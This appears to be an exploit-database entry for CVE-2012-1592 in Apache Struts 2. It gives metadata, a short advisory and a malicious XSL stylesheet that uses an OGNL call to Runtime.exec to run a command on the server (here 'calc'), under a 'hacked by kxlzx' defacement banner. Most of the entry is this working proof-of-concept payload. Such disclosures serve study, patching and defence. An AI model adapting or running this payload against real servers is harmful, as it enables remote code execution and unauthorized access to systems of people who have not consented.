EXPLOITS

Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload

Author: voidloafer
type: webapps
platform: java
port: 
date_added: 2012-03-23  
date_updated: 2016-10-10  
verified: 1  
codes: CVE-2012-1592;OSVDB-80547  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 37009.xml  

source: https://www.securityfocus.com/bid/52702/info

Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.

Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.example.com</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>